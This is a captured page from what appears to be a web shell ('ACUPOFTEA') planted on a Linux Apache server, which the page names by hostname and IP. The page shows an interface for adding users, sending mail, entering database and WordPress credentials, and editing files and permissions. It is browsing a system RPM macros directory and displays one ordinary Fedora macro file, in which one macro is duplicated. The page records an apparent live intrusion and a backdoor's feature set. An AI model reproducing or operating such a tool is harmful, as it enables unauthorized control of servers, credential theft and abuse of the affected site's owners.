System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib
/
rpm
/
macros.d
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
macros.fedora-misc
# Some miscellaneous Fedora-related macros # List files matching inclusion globs, excluding files matching exclusion blogs # Optional parameters: # – -i "<globs>" inclusion globs # – -x "<globs>" exclusion globs # Globs are space-separated lists of shell globs. Such lists require %{quote:} # use for safe rpm argument passing. # Alternatively, set the following rpm variables before calling the macro: # – “listfiles_include” inclusion globs # — “listfiles_exclude” exclusion globs # Arguments passed to the macro without flags will be interpreted as inclusion # globs. %listfiles(i:x:) %{expand: %if %{lua: print(string.len(rpm.expand("%{?-i*}%{?listfiles_include}%*")))} listfiles_include=$(realpath -e --relative-base=. %{?-i*} %{?listfiles_include} %* | sort -u) %if %{lua: print(string.len(rpm.expand("%{?-x*}%{?listfiles_exclude}")))} while IFS= read -r finc ; do realpath -qe --relative-base=. %{?-x*} %{?listfiles_exclude} \\ | sort -u | grep -q "${finc}" || echo "${finc}" done <<< "${listfiles_include}" %else echo "${listfiles_include}" %endif %endif } # https://github.com/rpm-software-management/rpm/issues/581 # Write the contents of a list of rpm variables to a macro file. # The target file must contain the corresponding anchors. # For example %writevars -f myfile foo bar will replace: # @@FOO@@ with the rpm evaluation of %{foo} and # @@BAR@@ with the rpm evaluation of %{bar} # in myfile %writevars(f:) %{lua: local fedora = require "fedora.common" local macrofile = rpm.expand("%{-f*}") local rpmvars = {} for i = 1, rpm.expand("%#") do table.insert(rpmvars, rpm.expand("%" .. i)) end fedora.writevars(macrofile,rpmvars) } # gpgverify verifies signed sources. There is documentation in the script. %gpgverify(k:s:d:) %{lua: local script = rpm.expand("%{_rpmconfigdir}/redhat/gpgverify ") local keyring = rpm.expand("%{-k*}") local signature = rpm.expand("%{-s*}") local data = rpm.expand("%{-d*}") print(script) if keyring ~= "" then print(rpm.expand("--keyring='%{SOURCE" .. keyring .. "}' ")) end if signature ~= "" then print(rpm.expand("--signature='%{SOURCE" .. signature .. "}' ")) end if data ~= "" then print(rpm.expand("--data='%{SOURCE" .. data .. "}' ")) end } # gpgverify verifies signed sources. There is documentation in the script. %gpgverify(k:s:d:) %{lua: local script = rpm.expand("%{_rpmconfigdir}/redhat/gpgverify ") local keyring = rpm.expand("%{-k*}") local signature = rpm.expand("%{-s*}") local data = rpm.expand("%{-d*}") print(script) if keyring ~= "" then print(rpm.expand("--keyring='%{SOURCE" .. keyring .. "}' ")) end if signature ~= "" then print(rpm.expand("--signature='%{SOURCE" .. signature .. "}' ")) end if data ~= "" then print(rpm.expand("--data='%{SOURCE" .. data .. "}' ")) end }
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-13 10:57:15
..
DIR
-
drwxr-xr-x
2024-12-18 10:57:28
macros.dwz
text/plain
1.76 KB
-rw-r--r--
2023-04-06 08:55:45
macros.efi-srpm
text/plain
3.01 KB
-rw-r--r--
2021-04-08 10:38:23
macros.environment-modules
text/plain
75 B
-rw-r--r--
2020-07-30 12:13:34
macros.fedora-misc
text/plain
2.76 KB
-rw-r--r--
2023-04-06 08:55:45
macros.fedora-misc-srpm
text/plain
239 B
-rw-r--r--
2023-04-06 08:55:45
macros.firewalld
text/plain
239 B
-rw-r--r--
2025-03-11 09:51:08
macros.forge
text/plain
12.43 KB
-rw-r--r--
2023-04-06 08:55:45
macros.ghc-srpm
text/plain
414 B
-rw-r--r--
2018-08-12 10:37:49
macros.go-srpm
text/plain
7.17 KB
-rw-r--r--
2021-04-08 02:45:20
macros.info
text/plain
390 B
-rw-r--r--
2022-04-18 05:09:26
macros.kernel-srpm
text/plain
116 B
-rw-r--r--
2023-04-06 08:55:45
macros.ldc-srpm
text/plain
73 B
-rw-r--r--
2023-04-06 08:55:45
macros.ldconfig
text/plain
307 B
-rw-r--r--
2023-04-06 08:55:45
macros.mono-srpm
text/plain
181 B
-rw-r--r--
2023-04-06 08:55:45
macros.nodejs-srpm
text/plain
324 B
-rw-r--r--
2023-04-06 08:55:45
macros.ocaml-srpm
text/plain
737 B
-rw-r--r--
2019-10-14 08:31:03
macros.openblas-srpm
text/plain
104 B
-rw-r--r--
2019-10-16 08:47:30
macros.perl
text/plain
5.06 KB
-rw-r--r--
2025-07-28 08:01:58
macros.perl-srpm
text/plain
794 B
-rw-r--r--
2019-10-13 02:18:38
macros.pybytecompile
text/plain
886 B
-rw-r--r--
2023-05-16 12:55:39
macros.python
text/plain
3.36 KB
-rw-r--r--
2023-05-16 12:55:39
macros.python-srpm
text/plain
5.95 KB
-rw-r--r--
2023-05-16 12:55:39
macros.python2
text/plain
1.82 KB
-rw-r--r--
2022-04-21 03:26:14
macros.python3
text/plain
3.63 KB
-rw-r--r--
2023-05-16 12:55:39
macros.rust-srpm
text/plain
61 B
-rw-r--r--
2018-01-08 07:15:07
macros.scl
text/plain
13.53 KB
-rw-r--r--
2023-04-01 04:10:31
macros.selinux-policy
text/plain
6.61 KB
-rw-r--r--
2024-12-17 04:10:18
macros.systemd
text/plain
4.03 KB
-rw-r--r--
2025-04-22 01:58:19
macros.systemtap
text/plain
206 B
-rw-r--r--
2023-10-14 01:06:48
macros.valgrind-srpm
text/plain
127 B
-rw-r--r--
2023-04-06 08:55:45
macros.vim
text/plain
40 B
-rw-r--r--
2025-10-12 12:16:44
macros.vpath
text/plain
228 B
-rw-r--r--
2023-04-06 08:55:45
~ ACUPOFTEA - mail.ontime-ae.com